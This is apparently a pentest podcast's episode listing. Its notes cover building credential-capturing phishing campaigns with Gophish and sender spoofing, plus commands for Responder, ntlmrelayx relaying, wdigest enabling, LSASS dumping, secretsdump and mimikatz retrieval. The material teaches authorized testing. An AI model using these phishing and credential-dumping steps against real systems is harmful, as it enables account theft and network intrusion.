7MS #481: Creating Kick-Butt Credential-Capturing Phishing Campaigns - Part 2

7MS #481: Creating Kick-Butt Credential-Capturing Phishing Campaigns - Part 2

Today we're revisiting how to make a kick-butt cred-capturing phishing campaign with Gophish, Amazon Lightsail, LetsEncrypt, ExpiredDomains.net and a special little extra something that makes creating phishing landing pages waaaaaaayyyyyyyyyy easier!

For some quicker review, you can check out part 1 and also the complementary YouTube video, but I wanted to revisit this kick-butt process and update a few items:

First, this SingleFile extension is amaaaaaaaazing for making phishing landing pages with ease!

The process to get GApps to let you generate an app-specific password for using with GoPhish is kinda annoying. The steps below should get you going:

  • After domain registration, log into admin.google.com or click Manage Workspace button at checkout.

  • At the next screen click Workspace Admin Console. Sign in with the person you'll be spoofing from, and the temporary password emailed to your backup email account during checkout.

  • In the search bar search for Less Secure Apps, choose Allow users to manage their access to less secure apps.

  • Now, in the upper right, hit Manage Your Google Account.

  • Under Security, click Protect your account and click Add phone number. Finish that process, then click Continue to your Google account.

  • Back at the main admin page, under Less secure app access, click Turn on access (not recommended).

  • At the next screen click Allow less secure apps: ON

  • Back at the main screen, click 2-Step Verification and set it to On.

  • Back at the main screen again, a new option called App passwords should be there. Click it. Choose to generate a custom name like LOL and then then an app password will appear. Write it down as it only appears once!

Finally, a quick reference for getting your LetsEncrypt cert to work with GoPhish. Get your LetsEncrypt cert generated, and then forge a .crt and .key file to use with GoPhish:

cp /etc/letsencrypt/live/YOUR-DOMAIN/fullchain.pem ./domain.crt cp /etc/letsencrypt/live/YOUR-DOMAIN/privkey.pem ./domain.key

Now go into the GoPhish .json config file and change the cert_path and key_path to the ones you just generated, and change use_tls to TRUE on both places in the config as well.

Avsnitt(706)

7MS #426: Tales of Internal Pentest Pwnage - Part 19

7MS #426: Tales of Internal Pentest Pwnage - Part 19

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more. First and foremost, I have to say that 7 Minute Security's official stance on toads is that nobody should be licking them at any time, for any reason. Also, I can neither confirm nor deny that toads can catch coronavirus. Listen to today's episode...it'll make more sense. We've got another swell tale of internal pentest pwnage for you today! Highlights include: If you've collected a ton of hashes with Responder, the included DumpHash.py gives you a lovely organized list of collected hashes! Here's one way you can grab the latest CME binary: curl https://github.com/byt3bl33d3r/CrackMapExec/releases/download/v5.0.1dev/cme-ubuntu-latest.zip -L -o cme.zip Note to self: I must've been using outdated CME forever, because the correct syntax to get the wdigest flag is now a little different: cme smb HOST -u localadmin -H "hash" --local-auth -M wdigest -o ACTION=enable If you're looking to block IPv6 (ab)use in your environment, this article has some great tips. When testing in an environment with a finely tuned SIEM, I highly recommend you download all the Kali updates and tools ahead of time, as sometimes just the call out to kali.org gets flagged and alerted on to the security team Before using the full hatecrack methodology, I like to run hashes straight through the list of PwnedPasswords from hashes.org (which appears to currently be offline) first to give the org an idea as to what users are using easy-to-pwn passwords. A question for YOU reading this: what's the best way to do an LSASS dump remotely without triggering AV? I can't get any of the popular methods to work. So pypykatz is my go-to. I learned that PowerView is awesome for finding attractive shares! Run it with Find-InterestingDomainShareFile to find, well, interesting files! Files with password or sensitive or admin in the title - and much more! Got to use PowerUpSQL to audit some MS SQL sauce, and I found this presentation (specifically slide ~19) really helpful in locating servers I could log into and any SQL vulnerabilities the boxes were ripe for.

7 Aug 202049min

7MS #425: DIY Pentest Dropbox Tips - Part 2

7MS #425: DIY Pentest Dropbox Tips - Part 2

Today's episode is all about creating and deploying your own pentest dropbox! In part 1 I talked about some "gotchas" but this time around I'm ready to dump a whole slug of specific and updated tips on ya! Below are the tips covered in this episode that are better read than said: For the Windows VM Turn on RDP with PowerShell: Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name "fDenyTSConnections" -Value 0 Enable-NetFirewallRule -DisplayGroup "Remote Desktop" Change time zone with command line: tzutil /s "Central Standard Time" Install Chrome with PowerShell: $LocalTempDir = $env:TEMP; $ChromeInstaller = "ChromeInstaller.exe"; (new-object System.Net.WebClient).DownloadFile('http://dl.google.com/chrome/install/375.126/chrome_installer.exe', "$LocalTempDir\$ChromeInstaller"); & "$LocalTempDir\$ChromeInstaller" /silent /install; $Process2Monitor = "ChromeInstaller"; Do { $ProcessesFound = Get-Process | ?{$Process2Monitor -contains $_.Name} | Select-Object -ExpandProperty Name; If ($ProcessesFound) { "Still running: $($ProcessesFound -join ', ')" | Write-Host; Start-Sleep -Seconds 2 } else { rm "$LocalTempDir\$ChromeInstaller" -ErrorAction SilentlyContinue -Verbose } } Until (!$ProcessesFound) Install PowerUpSQL: Install-Module -Name PowerUpSQL Turn off sleepy time: powercfg.exe -change -standby-timeout-ac 0 Install DotNet 3.5: dism /online /Enable-Feature /FeatureName:"NetFx3" For the Kali VM Refresh the SSH keys: apt install openssh-server -y mkdir /etc/ssh/default_keys mv /etc/ssh/ssh_host_* /etc/ssh/default_keys/ dpkg-reconfigure openssh-server systemctl enable ssh.service systemctl start ssh.service Get SharpHound and Mimikatz: wget https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200519/mimikatz_trunk.zip wget https://github.com/BloodHoundAD/BloodHound/raw/master/Ingestors/SharpHound.exe Install pypykatz sudo pip3 install pypykatz Install CrackMapExec binaries (which at time of this publication is this one): curl https://github.com/byt3bl33d3r/CrackMapExec/releases/download/v5.0.1dev/cme-ubuntu-latest.zip -L -o cme.zip

30 Juli 202037min

7MS #424: Cyber News - Everything is Pwned Edition

7MS #424: Cyber News - Everything is Pwned Edition

Hello! We're back with our pal Joe "The Machine" Skeen (a.k.a. Gh0sthax) who has prepared some awesome and actionable news stories for us to digest. Today's stories include: Hackers are trying to steal admin passwords from F5 devices Secret service reports increase in hacked MSPs Most Popular Home Routers Have 'Critical' Flaws "Sigred" DNS vulnerability in Microsoft DNS

22 Juli 202033min

7MS #423: Tales of Internal Pentest Pwnage - Part 18

7MS #423: Tales of Internal Pentest Pwnage - Part 18

This is an especially fun tale of pentest pwnage because it involves D.D.A.D. (Double Domain Admin Dance) and varying T.T.D.A. (Time to Domain Admin). The key takeaways I want to share from these tests are as follows: Responder.py -i eth0 -rPv is AWESOME. It can make the network rain hashes like manna from heaven! Testing the egress firewall is easy with this script. Consider this SANS article for guidance on ports to lock down. Testing for MS14-025 is easy with this site. mitm6 and ntlmrelayx can work really well together to rain shells if you follow this article. It's especially handy/focused when you create a targets.txt that looks something like this: smb://CORP\Administrator@192.168.195.2 smb://CORP\Administrator@192.168.195.3 smb://CORP\brian.admin@192.168.195.7 192.168.195.7 192.168.195.10 Then save that as your targets.txt and run ntlmrelayx with ./ntlmrelayx.py -tf /targets.txt -socks -smb2support. From there, once you get active socks connections, you can connect to them directly with a full interactive shell with something like proxychains smbclient //192.168.195.2/ -U CORP/brian.admin I ran into a weird issue with CrackMapExec where the --local-auth flag didn't seem to be working so I ended up trying the binary version and then it worked like a champ! Looking to dump lsass a "clean" way? Try RDPing in directly to the victim machine, opening up taskmgr.exe, click the Details tab, then right-click lsass.exe and choose Create dump file and bam, done. Wanna spin up a quick SMB share from your Kali box? Try smbserver.py -smb2support share /share Then, once you've pulled back the lsass.dmp file, you can rip through it easily with: pip3 install pypykatz sudo pypykatz lsa minidump lsass.dmp > lsass.txt Then comb through lsass.txt and hopefully there will be some delicious and nutritious DA creds there for you to much on!

15 Juli 202059min

7MS #422: Eating the Security Dog Food - Part 2

7MS #422: Eating the Security Dog Food - Part 2

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit [safepass.me](https://safepass.me/?7ms422 for more details, and tell them 7 Minute Security sent you to get a 10% discount! Today's episode continues the work we started in episode #419. We talk about the importance of having a good foundation of security documentation - including a reading out of the following policies: Acceptable use Data protection and privacy

10 Juli 202042min

7MS #421: Cyber News - Verizon DBIR Edition

7MS #421: Cyber News - Verizon DBIR Edition

Today my pal Gh0sthax and I pick apart the Verizon Data Breach Investigations Report and help you turn it into actionable items so you can better defend your network! I'm especially excited because today's episode marks two important 7MS firsts: The episode has been crafted by a professional podcast producer The episode has been transcribed by a professional transcription service

1 Juli 202036min

7MS #420: Tales of Internal Pentest Pwnage - Part 17

7MS #420: Tales of Internal Pentest Pwnage - Part 17

Today's episode is a fun tale of pentest pwnage! Interestingly, to me this pentest had a ton of time-sponging issues on the front end, but the TTDA (Time to Domain Admin) was maybe my fastest ever. I had to actually roll a fresh Kali VM to upload to the customer site, and I learned (the hard way) to make that VM disk as lean as possible. I got away with a 15 gig drive, and the OS+tools+updates took up about 12 gig. One of the biggest lessons I learned from this experience is to make sure that not only is your Kali box updated before you take it to a customer site (see this script), but you should make sure you install all the tool dependencies beforehand as well (specifically, Eyewitness, Impacket and MITM6). This pentest was also extremely time-boxed, so I tried to get as much bang out of it as possible. This included: Capturing hashes with Responder Checking for "Kerberoastable" accounts (GetUserSPNs.py -request -dc-ip x.x.x.x domain/user) Check for MS14-025 (see this article) Check for MS17-010 (nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms17-010 192.168.0.0/24 -oA vulnerable-2-eblue) and try this method of exploiting it Check for DNS zone transfer (dnsrecon -d name.of.fqdn -t axf) Test for egress filtering of ports 1-1024 Took a backup of AD "the Microsoft way" and then cracked with secretsdump: sudo python ./secretsdump.py -ntds /loot/Active\ Directory/ntds.dit -system /loot/registry/SYSTEM -hashes lmhash:nthash LOCAL -outputfile /loot/ad-pw-dump

26 Juni 202044min

7MS #419: Eating the Security Dog Food

7MS #419: Eating the Security Dog Food

Today we're talking about eating the security dog food! What do I mean by that? Well, a lot of security companies I worked for in the past preached to clients about the importance of having a good security program, but didn't have one of their own! I'm trying to break that pattern now that I'm in a position to lead an information security program for 7MS. In today's episode we talk about getting your company started with a good set of infosec policies/procedures. First up is a "mothership" infosec policy with the following sub-policies inside it: Acceptable Use Data Protection and Privacy Physical Security Tools and Technology Training and Awareness Reporting Oh, and the song I jazz/scat/sang coming out of the jingle was If I Were a Dog

17 Juni 202040min

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